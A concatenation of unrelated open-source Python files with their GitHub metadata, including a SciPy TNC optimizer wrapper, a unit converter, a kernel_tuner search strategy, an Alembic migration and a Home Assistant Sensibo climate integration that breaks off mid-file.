            set to max(100, 10*len(x0)). Defaults to None.
        eta : float
            Severity of the line search. if < 0 or > 1, set to 0.25.
            Defaults to -1.
        stepmx : float
            Maximum step for the line search. May be increased during
            call. If too small, it will be set to 10.0. Defaults to 0.
        accuracy : float
            Relative precision for finite difference calculations. If
            <= machine_precision, set to sqrt(machine_precision).
            Defaults to 0.
        minfev : float
            Minimum function value estimate. Defaults to 0.
        ftol : float
            Precision goal for the value of f in the stopping criterion.
            If ftol < 0.0, ftol is set to 0.0 defaults to -1.
        xtol : float
            Precision goal for the value of x in the stopping
            criterion (after applying x scaling factors). If xtol <
            0.0, xtol is set to sqrt(machine_precision). Defaults to
            -1.
        gtol : float
            Precision goal for the value of the projected gradient in
            the stopping criterion (after applying x scaling factors).
            If gtol < 0.0, gtol is set to 1e-2 * sqrt(accuracy).
            Setting it to 0.0 is not recommended. Defaults to -1.
        rescale : float
            Scaling factor (in log10) used to trigger f value
            rescaling. If 0, rescale at each iteration. If a large
            value, never rescale. If < 0, rescale is set to 1.3.
    This function is called by the `minimize` function with `method=TNC`.
    It is not supposed to be called directly.
    """
    _check_unknown_options(unknown_options)
    # map the public option names onto the names used historically by
    # fmin_tnc and the C module
    epsilon = eps
    maxfun = maxiter
    fmin = minfev
    pgtol = gtol
    x0 = asarray(x0, dtype=float).tolist()
    n = len(x0)
    if bounds is None:
        bounds = [(None,None)] * n
    if len(bounds) != n:
        raise ValueError('length of x0 != length of bounds')
    # choose verbosity: explicit mesg_num wins, then the disp boolean
    if mesg_num is not None:
        messages = {0:MSG_NONE, 1:MSG_ITER, 2:MSG_INFO, 3:MSG_VERS,
                    4:MSG_EXIT, 5:MSG_ALL}.get(mesg_num, MSG_ALL)
    elif disp:
        messages = MSG_ALL
    else:
        messages = MSG_NONE
    if jac is None:
        # no gradient supplied: approximate it with finite differences
        def func_and_grad(x):
            x = asarray(x)
            f = fun(x, *args)
            g = approx_fprime(x, fun, epsilon, *args)
            return f, list(g)
    else:
        def func_and_grad(x):
            x = asarray(x)
            f = fun(x, *args)
            g = jac(x, *args)
            return f, list(g)
    """
    low, up : the bounds (lists of floats)
    if low is None, the lower bounds are removed.
    if up is None, the upper bounds are removed.
    low and up defaults to None
    """
    # Convert the (min, max) pairs into the separate low/up lists the C
    # solver expects, using +/-inf for missing bounds.
    low = [0]*n
    up = [0]*n
    for i in range(n):
        if bounds[i] is None:
            l, u = -inf, inf
        else:
            l,u = bounds[i]
        # BUG FIX: these None-checks were nested inside the `else:` branch
        # above, so an entry with ``bounds[i] is None`` left
        # ``low[i] = up[i] = 0`` and silently pinned that variable to 0
        # instead of leaving it unconstrained.  They must run for every i.
        if l is None:
            low[i] = -inf
        else:
            low[i] = l
        if u is None:
            up[i] = inf
        else:
            up[i] = u
    # empty lists tell the C module to use its internal defaults
    if scale is None:
        scale = []
    if offset is None:
        offset = []
    if maxfun is None:
        maxfun = max(100, 10*len(x0))
    # run the C implementation of truncated Newton
    rc, nf, nit, x = moduleTNC.minimize(func_and_grad, x0, low, up, scale,
                                        offset, messages, maxCGit, maxfun,
                                        eta, stepmx, accuracy, fmin, ftol,
                                        xtol, pgtol, rescale, callback)
    xopt = array(x)
    funv, jacv = func_and_grad(xopt)
    # rc in {LOCALMINIMUM, FCONVERGED, XCONVERGED} counts as success
    return Result(x=xopt, fun=funv, jac=jacv, nfev=nf, nit=nit, status=rc,
                  message=RCSTRINGS[rc], success=(-1 < rc < 3))
if __name__ == '__main__':
    # Examples for TNC
    def example():
        """Minimize f(x) = x0**2 + |x1|**3 subject to simple bounds.

        With x0 in [-10, 10] and x1 in [1, 10] the constrained minimum is
        at [0, 1], which is what the printout below claims.
        """
        print("Example")
        # A function to minimize: returns the value and its gradient.
        def function(x):
            f = pow(x[0],2.0)+pow(abs(x[1]),3.0)
            g = [0,0]
            g[0] = 2.0*x[0]
            g[1] = 3.0*pow(abs(x[1]),2.0)
            if x[1]<0:
                g[1] = -g[1]
            return f, g
        # Optimizer call.
        # BUG FIX: `bounds` must be a sequence of (min, max) pairs, one pair
        # per variable.  The old call passed ([-10, 1], [10, 10]) -- the
        # legacy separate low/up lists -- which, read as pairs, pins x1 to
        # [10, 10] and can never reach the documented solution [0, 1].
        x, nf, rc = fmin_tnc(function, [-7, 3], bounds=([-10, 10], [1, 10]))
        print("After", nf, "function evaluations, TNC returned:", RCSTRINGS[rc])
        print("x =", x)
        print("exact value = [0, 1]")
        print()
    example()
|
{
"content_hash": "dc4a2526ea0af7b28b40c19a6d86379c",
"timestamp": "",
"source": "github",
"line_count": 404,
"max_line_length": 84,
"avg_line_length": 37.35643564356435,
"alnum_prop": 0.5932282003710575,
"repo_name": "Universal-Model-Converter/UMC3.0a",
"id": "d8ea6d41ed16bc069b33f7923b2cf91c6c404a13",
"size": "16296",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/Python/x86/Lib/site-packages/scipy/optimize/tnc.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "226"
},
{
"name": "C",
"bytes": "1082640"
},
{
"name": "C#",
"bytes": "8440"
},
{
"name": "C++",
"bytes": "3621086"
},
{
"name": "CSS",
"bytes": "6226"
},
{
"name": "F#",
"bytes": "2310"
},
{
"name": "FORTRAN",
"bytes": "7795"
},
{
"name": "Forth",
"bytes": "506"
},
{
"name": "GLSL",
"bytes": "1040"
},
{
"name": "Groff",
"bytes": "5943"
},
{
"name": "HTML",
"bytes": "1196266"
},
{
"name": "Java",
"bytes": "5793"
},
{
"name": "Makefile",
"bytes": "1109"
},
{
"name": "Mask",
"bytes": "969"
},
{
"name": "Matlab",
"bytes": "4346"
},
{
"name": "Python",
"bytes": "33351557"
},
{
"name": "R",
"bytes": "1370"
},
{
"name": "Shell",
"bytes": "6931"
},
{
"name": "Tcl",
"bytes": "2084458"
},
{
"name": "Visual Basic",
"bytes": "481"
}
],
"symlink_target": ""
}
|
from Database.Controllers.Predio import Predio
from Database.Controllers.Resp_sala import Resp_sala
class Sala(object):
    """Model for a room (sala): id, code, and foreign keys to its
    building (predio) and responsible person (resp_sala)."""

    def __init__(self, dados=None):
        # Populate the instance from a row-like mapping, when one is given;
        # an empty Sala carries no attributes until the setters are used.
        if dados is None:
            return
        self.id = dados['id']
        self.id_resp_sala = dados['id_resp_sala']
        self.codigo = dados['codigo']
        self.id_predio = dados['id_predio']

    def getId(self):
        """Return this room's primary key."""
        return self.id

    def setId_resp_sala(self, id_resp_sala):
        """Set the id of the person responsible for the room."""
        self.id_resp_sala = id_resp_sala

    def getId_resp_sala(self):
        """Return the id of the person responsible for the room."""
        return self.id_resp_sala

    def getResp_sala(self):
        """Look up and return the responsible person's name."""
        responsavel = Resp_sala().pegarResp_sala('id = %s', (self.id_resp_sala,))
        return responsavel.getNome()

    def setCodigo(self, codigo):
        """Set the room code."""
        self.codigo = codigo

    def getCodigo(self):
        """Return the room code."""
        return self.codigo

    def setId_predio(self, id_predio):
        """Set the id of the building that contains the room."""
        self.id_predio = id_predio

    def getId_predio(self):
        """Return the id of the building that contains the room."""
        return self.id_predio

    def getPredio(self):
        """Look up and return the name of the room's building."""
        predio = Predio().pegarPredio('id = %s', (self.id_predio,))
        return predio.getNome()
|
{
"content_hash": "8675f838bbe1922b3645380626719ce5",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 79,
"avg_line_length": 23.564102564102566,
"alnum_prop": 0.6800870511425462,
"repo_name": "AEDA-Solutions/matweb",
"id": "a9cedb135e718541a69bddfeff7e94f31f2ddd84",
"size": "919",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "backend/Database/Models/Sala.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "475557"
},
{
"name": "HTML",
"bytes": "12097161"
},
{
"name": "JavaScript",
"bytes": "190487"
},
{
"name": "PHP",
"bytes": "1122"
},
{
"name": "Python",
"bytes": "152996"
},
{
"name": "Shell",
"bytes": "80"
}
],
"symlink_target": ""
}
|
"""
Enhanced Unit Converter
This is my solution to the "Enhanced Unit Converter" problem. [1] Here, we are presented with
a simple script that runs conversions between kilometres and miles. The task at hand is to ex-
tend the script to run conversions between kilograms and pounds and fahrenheit and celsius.
[1] Saha, A. (2015). Doing Math with Python: Use Programming to Explore Algebra, Statistics,
Calculus, and More! San Francisco: No Starch Press (Ch. 1, Challenge #3).
"""
import sys
from decimal import Decimal, getcontext
getcontext().prec = 5  # round every Decimal result to 5 significant digits
# Conversion helpers.  Each takes a number and returns a Decimal.
f_f2c = lambda x: Decimal(.5556) * Decimal(x - 32) # fahrenheit to celsius
# BUG FIX: celsius -> fahrenheit is C * 9/5 + 32.  The old lambda repeated
# the fahrenheit->celsius formula ((x - 32) * .5556), so menu option 2
# returned wrong values (e.g. 100 C came out as ~37.8 instead of 212).
f_c2f = lambda x: Decimal(x) * Decimal(1.8) + 32 # celsius to fahrenheit
f_k2p = lambda x: Decimal(x) * Decimal(2.204600) # kilograms to pounds
f_p2k = lambda x: Decimal(x) / Decimal(2.204600) # pounds to kilograms
f_k2m = lambda x: Decimal(x) / Decimal(1.609344) # kilometres to miles
f_m2k = lambda x: Decimal(x) * Decimal(1.609344) # miles to kilometres
if __name__ == '__main__':
    try:
        done = False
        print "==============================================="
        print "= Enhanced Unit Converter"
        print "= \tBy Alexander Ahmann"
        print "==============================================="
        # Menu loop: keep offering conversions until the user picks 7.
        while not done:
            print "\nOptions to choose from:"
            print "1) Convert Fahrenheit to Celsius"
            print "2) Convert Celsius to Fahrenheit"
            print "3) Convert Kilograms to Pounds"
            print "4) Convert Pounds to Kilograms"
            print "5) Convert Kilometres to Miles"
            print "6) Convert Miles to Kilometres"
            print "7) Exit"
            # raises ValueError on non-numeric input, caught by the outer try
            operation = int(raw_input("What do you want to do? "))
            # Each branch reads a value, prints the conversion, and pauses:
            # the trailing raw_input inside the print waits for ENTER.
            if operation == 1:
                x = Decimal(raw_input("Enter fahrenheits to convert: "))
                print "To celsius:",f_f2c(x),raw_input("\n\nPress [ENTER] to continue...")
            elif operation == 2:
                x = Decimal(raw_input("Enter celsius to convert: "))
                print "To fahrenheit:",f_c2f(x),raw_input("\n\nPress [ENTER] to continue...")
            elif operation == 3:
                x = Decimal(raw_input("Enter kilograms to convert: "))
                print "To pounds:",f_k2p(x),raw_input("\n\nPress [ENTER] to continue...")
            elif operation == 4:
                x = Decimal(raw_input("Enter pounds to convert: "))
                print "To kilograms:",f_p2k(x),raw_input("\n\nPress [ENTER] to continue...")
            elif operation == 5:
                x = Decimal(raw_input("Enter kilometres to convert: "))
                print "To miles:",f_k2m(x),raw_input("\n\nPress [ENTER] to continue...")
            elif operation == 6:
                x = Decimal(raw_input("Enter miles to convert: "))
                print "To kilometres:",f_m2k(x),raw_input("\n\nPress [ENTER] to continue...")
            elif operation == 7:
                done = True
            else:
                print "Please select an option between 1-7"
    # NOTE(review): a bare `except:` also swallows KeyboardInterrupt and
    # SystemExit; `except Exception` would be safer here.
    except:
        print "Exception:",sys.exc_info()[0]
|
{
"content_hash": "661adc43026b2309da0805fe5e9f60ec",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 94,
"avg_line_length": 41.39393939393939,
"alnum_prop": 0.6504392386530015,
"repo_name": "mathmare/Misc",
"id": "a31814614ae17cd5e734b831ea340d114d5a6d8c",
"size": "2733",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Problems/DMWP/unitconvert.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C#",
"bytes": "4096"
},
{
"name": "Python",
"bytes": "12134"
}
],
"symlink_target": ""
}
|
""" The differential evolution strategy that optimizes the search through the parameter space """
from scipy.optimize import differential_evolution
from kernel_tuner.searchspace import Searchspace
from kernel_tuner.strategies.minimize import get_bounds, _cost_func, scale_from_params
from kernel_tuner import util
# Mutation/crossover strategy names accepted by
# scipy.optimize.differential_evolution's `strategy` argument.
supported_methods = ["best1bin", "best1exp", "rand1exp", "randtobest1exp",
                     "best2exp", "rand2exp", "randtobest1bin", "best2bin", "rand2bin", "rand1bin"]
def tune(runner, kernel_options, device_options, tuning_options):
    """Search the parameter space with SciPy's differential evolution.

    :params runner: A runner from kernel_tuner.runners
    :type runner: kernel_tuner.runner

    :param kernel_options: A dictionary with all options for the kernel.
    :type kernel_options: kernel_tuner.interface.Options

    :param device_options: A dictionary with all options for the device
        on which the kernel should be tuned.
    :type device_options: kernel_tuner.interface.Options

    :param tuning_options: A dictionary with all options regarding the tuning
        process.
    :type tuning_options: kernel_tuner.interface.Options

    :returns: A list of dictionaries for executed kernel configurations and their
        execution times. And a dictionary that contains a information
        about the hardware/software environment on which the tuning took place.
    :rtype: list(dict()), dict()
    """
    strategy_opts = tuning_options.strategy_options
    de_strategy = strategy_opts.get("method", "best1bin")
    population_size = strategy_opts.get("popsize", 20)
    generations = strategy_opts.get("maxiter", 50)

    tuning_options["scaling"] = False

    # every evaluated configuration is appended to this list by _cost_func
    evaluated = []
    cost_args = (kernel_options, tuning_options, runner, evaluated)

    # bounds array in the shape the optimizer expects
    bounds = get_bounds(tuning_options.tune_params)

    # draw the initial population from the restricted search space, so every
    # individual starts on a legal configuration
    searchspace = Searchspace(tuning_options, runner.dev.max_threads)
    initial_population = [list(sample)
                          for sample in searchspace.get_random_sample(population_size)]

    # run the optimizer; a StopCriterionReached simply ends the search early
    opt_result = None
    try:
        opt_result = differential_evolution(_cost_func, bounds, cost_args,
                                            maxiter=generations,
                                            popsize=population_size,
                                            init=initial_population,
                                            polish=False,
                                            strategy=de_strategy,
                                            disp=tuning_options.verbose)
    except util.StopCriterionReached as stop:
        if tuning_options.verbose:
            print(stop)

    if opt_result and tuning_options.verbose:
        print(opt_result.message)

    return evaluated, runner.dev.get_environment()
|
{
"content_hash": "0cc7d75c9a3db067545234063e22425a",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 120,
"avg_line_length": 39.71212121212121,
"alnum_prop": 0.7134681419305609,
"repo_name": "benvanwerkhoven/kernel_tuner",
"id": "30cee8c1fa7c07752c5497659a074509f47661b3",
"size": "2621",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kernel_tuner/strategies/diff_evo.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Cuda",
"bytes": "3766"
},
{
"name": "Python",
"bytes": "425339"
}
],
"symlink_target": ""
}
|
"""Create table GenomicGCROutreachEscalationNotified
Revision ID: b7971e81863c
Revises: b64334fe7ec7, 68e4e375cec3
Create Date: 2022-11-08 16:46:57.006039
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'b7971e81863c'
# A tuple of parents marks this as a merge revision: it joins the
# b64334fe7ec7 and 68e4e375cec3 heads of the migration graph.
down_revision = ('b64334fe7ec7', '68e4e375cec3')
branch_labels = None
depends_on = None
def upgrade(engine_name):
    """Dispatch to the engine-specific upgrade function (e.g. upgrade_rdr)."""
    handler = globals()[f"upgrade_{engine_name}"]
    handler()
def downgrade(engine_name):
    """Dispatch to the engine-specific downgrade function (e.g. downgrade_rdr)."""
    handler = globals()[f"downgrade_{engine_name}"]
    handler()
def upgrade_rdr():
    """Create the genomic_gcr_outreach_escalation_notified table in rdr."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('genomic_gcr_outreach_escalation_notified',
    sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
    sa.Column('created', sa.DateTime(), nullable=True),
    sa.Column('modified', sa.DateTime(), nullable=True),
    sa.Column('participant_id', sa.Integer(), nullable=False),
    sa.ForeignKeyConstraint(['participant_id'], ['participant.participant_id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    # Index participant_id to support lookups by participant.
    op.create_index(op.f('ix_genomic_gcr_outreach_escalation_notified_participant_id'), 'genomic_gcr_outreach_escalation_notified', ['participant_id'], unique=False)
    # ### end Alembic commands ###
def downgrade_rdr():
    """Drop the genomic_gcr_outreach_escalation_notified table and its index."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.drop_index(op.f('ix_genomic_gcr_outreach_escalation_notified_participant_id'), table_name='genomic_gcr_outreach_escalation_notified')
    op.drop_table('genomic_gcr_outreach_escalation_notified')
    # ### end Alembic commands ###
def upgrade_metrics():
    """No schema changes for the metrics database in this revision."""
    # ### commands auto generated by Alembic - please adjust! ###
    pass
    # ### end Alembic commands ###
def downgrade_metrics():
    """No schema changes to revert for the metrics database."""
    # ### commands auto generated by Alembic - please adjust! ###
    pass
    # ### end Alembic commands ###
|
{
"content_hash": "ae9a5b4005d74e766e52574fc67cb662",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 165,
"avg_line_length": 31.11864406779661,
"alnum_prop": 0.6944444444444444,
"repo_name": "all-of-us/raw-data-repository",
"id": "eef8265a3e54fc10d3468d79f4ed1cc49ef1f93f",
"size": "1836",
"binary": false,
"copies": "1",
"ref": "refs/heads/devel",
"path": "rdr_service/alembic/versions/b7971e81863c_create_table_.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "1866"
},
{
"name": "Mako",
"bytes": "1715"
},
{
"name": "Python",
"bytes": "17040924"
},
{
"name": "R",
"bytes": "2212"
},
{
"name": "Shell",
"bytes": "92213"
}
],
"symlink_target": ""
}
|
"""
The MIT License (MIT)
Copyright (c) 2017 LeanIX GmbH
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually.
"""
class Document:
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    def __init__(self):
        # Maps each attribute name to its swagger type string; presumably
        # consumed by the SDK's (de)serialization machinery — not visible
        # from this file.
        self.swaggerTypes = {
            'ID': 'str',
            'name': 'str',
            'url': 'str',
            'topic': 'str',
            'version': 'str',
            'documentTypeID': 'str',
            'referenceSystem': 'str',
            'referenceType': 'str',
            'referenceID': 'str',
            'referenceSyncTime': 'str',
            'description': 'str',
            'factSheetHasDocuments': 'list[FactSheetHasDocument]'
        }
        # All attributes default to None until populated from API data.
        self.ID = None # str
        self.name = None # str
        self.url = None # str
        self.topic = None # str
        self.version = None # str
        self.documentTypeID = None # str
        self.referenceSystem = None # str
        self.referenceType = None # str
        self.referenceID = None # str
        self.referenceSyncTime = None # str
        self.description = None # str
        self.factSheetHasDocuments = None # list[FactSheetHasDocument]
{
"content_hash": "cf8d462d7cd43cb3ef18e48e1cb23c21",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 105,
"avg_line_length": 39.067796610169495,
"alnum_prop": 0.6646420824295011,
"repo_name": "leanix/leanix-sdk-python",
"id": "44dfa24f9745bea4e752702b27f37e0963b92fde",
"size": "2327",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/leanix/models/Document.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1555496"
},
{
"name": "Scala",
"bytes": "1911"
}
],
"symlink_target": ""
}
|
def run(impl):
    """Commit one version of 'file', then overwrite it with whitespace tweaks
    plus an extra line, leaving the change uncommitted."""
    committed_content = 'First line\nThis is the second line\n'
    # First revision: create the file and commit it.
    impl.save_file('file', committed_content)
    impl.add_new_file('file')
    impl.commit_all('Add files')
    # Working-copy edit only: embedded tab, trailing space, and a new line.
    impl.save_file('file', 'First line\nThis is the \tsecond line \nThe last line\n')
    return []
|
{
"content_hash": "9292db926667b4ad5159c8079e2405e5",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 89,
"avg_line_length": 30,
"alnum_prop": 0.6666666666666666,
"repo_name": "erdavila/git-svn-diff",
"id": "be557012d763177a04861a0757455bc3c3bc2c97",
"size": "240",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/cases/options_for_git_diff.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "38096"
}
],
"symlink_target": ""
}
|
"""Support for Sensibo wifi-enabled home thermostats."""
import asyncio
import logging
import aiohttp
import async_timeout
import pysensibo
import voluptuous as vol
from homeassistant.components.climate import PLATFORM_SCHEMA, ClimateEntity
from homeassistant.components.climate.const import (
HVAC_MODE_COOL,
HVAC_MODE_DRY,
HVAC_MODE_FAN_ONLY,
HVAC_MODE_HEAT,
HVAC_MODE_HEAT_COOL,
HVAC_MODE_OFF,
SUPPORT_FAN_MODE,
SUPPORT_SWING_MODE,
SUPPORT_TARGET_TEMPERATURE,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_STATE,
ATTR_TEMPERATURE,
CONF_API_KEY,
CONF_ID,
STATE_ON,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from homeassistant.exceptions import PlatformNotReady
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.util.temperature import convert as convert_temperature
from .const import DOMAIN as SENSIBO_DOMAIN
_LOGGER = logging.getLogger(__name__)
# Sentinel for CONF_ID meaning "expose every device on the account".
ALL = ["all"]
# Timeout (seconds) passed to the Sensibo API client for each request.
TIMEOUT = 10
SERVICE_ASSUME_STATE = "assume_state"
# Platform configuration: an API key is required; `id` narrows the set of
# device ids to expose (defaults to all of them).
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
    {
        vol.Required(CONF_API_KEY): cv.string,
        vol.Optional(CONF_ID, default=ALL): vol.All(cv.ensure_list, [cv.string]),
    }
)
# Schema for the assume_state service: a state string, optionally limited
# to specific climate entities.
ASSUME_STATE_SCHEMA = vol.Schema(
    {vol.Optional(ATTR_ENTITY_ID): cv.entity_ids, vol.Required(ATTR_STATE): cv.string}
)
# Field selectors requested from the Sensibo API on every device fetch.
_FETCH_FIELDS = ",".join(
    [
        "room{name}",
        "measurements",
        "remoteCapabilities",
        "acState",
        "connectionStatus{isAlive}",
        "temperatureUnit",
    ]
)
# The initial fetch additionally needs the device id.
_INITIAL_FETCH_FIELDS = f"id,{_FETCH_FIELDS}"
# Maps a key present in the device's acState to the climate-entity support
# flag it implies.
FIELD_TO_FLAG = {
    "fanLevel": SUPPORT_FAN_MODE,
    "swing": SUPPORT_SWING_MODE,
    "targetTemperature": SUPPORT_TARGET_TEMPERATURE,
}
# Sensibo mode names <-> Home Assistant HVAC modes.
SENSIBO_TO_HA = {
    "cool": HVAC_MODE_COOL,
    "heat": HVAC_MODE_HEAT,
    "fan": HVAC_MODE_FAN_ONLY,
    "auto": HVAC_MODE_HEAT_COOL,
    "dry": HVAC_MODE_DRY,
}
HA_TO_SENSIBO = {value: key for key, value in SENSIBO_TO_HA.items()}
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
    """Set up Sensibo devices."""
    client = pysensibo.SensiboClient(
        config[CONF_API_KEY], session=async_get_clientsession(hass), timeout=TIMEOUT
    )
    devices = []
    try:
        # Create one climate entity per device, filtered by the configured ids.
        for dev in await client.async_get_devices(_INITIAL_FETCH_FIELDS):
            if config[CONF_ID] == ALL or dev["id"] in config[CONF_ID]:
                devices.append(
                    SensiboClimate(client, dev, hass.config.units.temperature_unit)
                )
    except (
        aiohttp.client_exceptions.ClientConnectorError,
        asyncio.TimeoutError,
        pysensibo.SensiboError,
    ) as err:
        # Connectivity problems: let Home Assistant retry the setup later.
        _LOGGER.exception("Failed to connect to Sensibo servers")
        raise PlatformNotReady from err
    if not devices:
        return
    async_add_entities(devices)

    async def async_assume_state(service):
        """Set state according to external service call."""
        entity_ids = service.data.get(ATTR_ENTITY_ID)
        # No entity_ids in the call means "apply to every Sensibo device".
        if entity_ids:
            target_climate = [
                device for device in devices if device.entity_id in entity_ids
            ]
        else:
            target_climate = devices
        update_tasks = []
        for climate in target_climate:
            await climate.async_assume_state(service.data.get(ATTR_STATE))
            update_tasks.append(climate.async_update_ha_state(True))
        if update_tasks:
            await asyncio.wait(update_tasks)

    # The service handler closes over `devices` built above.
    hass.services.async_register(
        SENSIBO_DOMAIN,
        SERVICE_ASSUME_STATE,
        async_assume_state,
        schema=ASSUME_STATE_SCHEMA,
    )
class SensiboClimate(ClimateEntity):
"""Representation of a Sensibo device."""
    def __init__(self, client, data, units):
        """Build SensiboClimate.
        client: pysensibo.SensiboClient.
        data: initially-fetched device data.
        units: hass-configured temperature unit, used as a fallback.
        """
        self._client = client
        self._id = data["id"]
        # Externally-assumed state, if any; overrides the computed state.
        self._external_state = None
        self._units = units
        self._available = False
        # Populate the remaining cached attributes from the fetched data.
        self._do_update(data)
    @property
    def supported_features(self):
        """Return the list of supported features."""
        return self._supported_features
    def _do_update(self, data):
        # Refresh all cached entity state from a freshly fetched device dict.
        self._name = data["room"]["name"]
        self._measurements = data["measurements"]
        self._ac_states = data["acState"]
        self._available = data["connectionStatus"]["isAlive"]
        capabilities = data["remoteCapabilities"]
        # HVAC modes the remote supports, plus "off" which is always valid.
        self._operations = [SENSIBO_TO_HA[mode] for mode in capabilities["modes"]]
        self._operations.append(HVAC_MODE_OFF)
        # Fan levels / swing / temperatures depend on the current a/c mode.
        self._current_capabilities = capabilities["modes"][self._ac_states["mode"]]
        # Prefer the device-level unit, falling back to the one in acState.
        temperature_unit_key = data.get("temperatureUnit") or self._ac_states.get(
            "temperatureUnit"
        )
        if temperature_unit_key:
            self._temperature_unit = (
                TEMP_CELSIUS if temperature_unit_key == "C" else TEMP_FAHRENHEIT
            )
            self._temperatures_list = (
                self._current_capabilities["temperatures"]
                .get(temperature_unit_key, {})
                .get("values", [])
            )
        else:
            # Unit unknown: use the hass-configured unit and accept any
            # target temperature (empty list disables the whitelist).
            self._temperature_unit = self._units
            self._temperatures_list = []
        # Derive the supported-feature bitmask from the keys in acState.
        self._supported_features = 0
        for key in self._ac_states:
            if key in FIELD_TO_FLAG:
                self._supported_features |= FIELD_TO_FLAG[key]
@property
def state(self):
"""Return the current state."""
return self._external_state or super().state
@property
def extra_state_attributes(self):
"""Return the state attributes."""
return {"battery": self.current_battery}
@property
def temperature_unit(self):
"""Return the unit of measurement which this thermostat uses."""
return self._temperature_unit
@property
def available(self):
"""Return True if entity is available."""
return self._available
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
return self._ac_states.get("targetTemperature")
@property
def target_temperature_step(self):
"""Return the supported step of target temperature."""
if self.temperature_unit == self.hass.config.units.temperature_unit:
# We are working in same units as the a/c unit. Use whole degrees
# like the API supports.
return 1
# Unit conversion is going on. No point to stick to specific steps.
return None
@property
def hvac_mode(self):
"""Return current operation ie. heat, cool, idle."""
if not self._ac_states["on"]:
return HVAC_MODE_OFF
return SENSIBO_TO_HA.get(self._ac_states["mode"])
@property
def current_humidity(self):
    """Return the current humidity from the device measurements."""
    return self._measurements["humidity"]
@property
def current_battery(self):
    """Return the current battery voltage, or None when the device
    measurements do not include one."""
    return self._measurements.get("batteryVoltage")
@property
def current_temperature(self):
    """Return the current temperature in the entity's unit.

    The measurement is not affected by temperatureUnit; the API
    always reports it in Celsius, so convert before returning.
    """
    celsius_value = self._measurements["temperature"]
    return convert_temperature(celsius_value, TEMP_CELSIUS, self.temperature_unit)
@property
def hvac_modes(self):
    """List of available operation modes (device capabilities mapped
    to HA constants, plus the off mode)."""
    return self._operations
@property
def fan_mode(self):
    """Return the current fan setting, or None when the AC state
    has no fan level."""
    return self._ac_states.get("fanLevel")
@property
def fan_modes(self):
    """List of available fan modes, or None when the current mode's
    capabilities do not define fan levels."""
    return self._current_capabilities.get("fanLevels")
@property
def swing_mode(self):
    """Return the current swing setting, or None when the AC state
    has no swing value."""
    return self._ac_states.get("swing")
@property
def swing_modes(self):
    """List of available swing modes, or None when the current
    mode's capabilities do not define them."""
    return self._current_capabilities.get("swing")
@property
def name(self):
    """Return the display name of this climate entity."""
    return self._name
@property
def min_temp(self):
    """Return the minimum settable temperature, falling back to the
    base entity default when the device lists no temperatures."""
    if self._temperatures_list:
        return self._temperatures_list[0]
    return super().min_temp
@property
def max_temp(self):
    """Return the maximum settable temperature, falling back to the
    base entity default when the device lists no temperatures."""
    if self._temperatures_list:
        return self._temperatures_list[-1]
    return super().max_temp
@property
def unique_id(self):
    """Return a unique ID based on the Sensibo device ID."""
    return self._id
async def async_set_temperature(self, **kwargs):
    """Set new target temperature.

    When the requested value is not in the device's supported list,
    step one entry up or down from the current target toward the
    request; when already at the closest supported value, do nothing.
    """
    temperature = kwargs.get(ATTR_TEMPERATURE)
    if temperature is None:
        return
    temperature = int(temperature)
    if temperature not in self._temperatures_list:
        # Requested temperature is not supported.
        if temperature == self.target_temperature:
            return
        index = self._temperatures_list.index(self.target_temperature)
        if (
            temperature > self.target_temperature
            and index < len(self._temperatures_list) - 1
        ):
            temperature = self._temperatures_list[index + 1]
        elif temperature < self.target_temperature and index > 0:
            temperature = self._temperatures_list[index - 1]
        else:
            # Already at the edge of the supported range; nothing to do.
            return
    # NOTE(review): sync `with` on async_timeout.timeout matches the
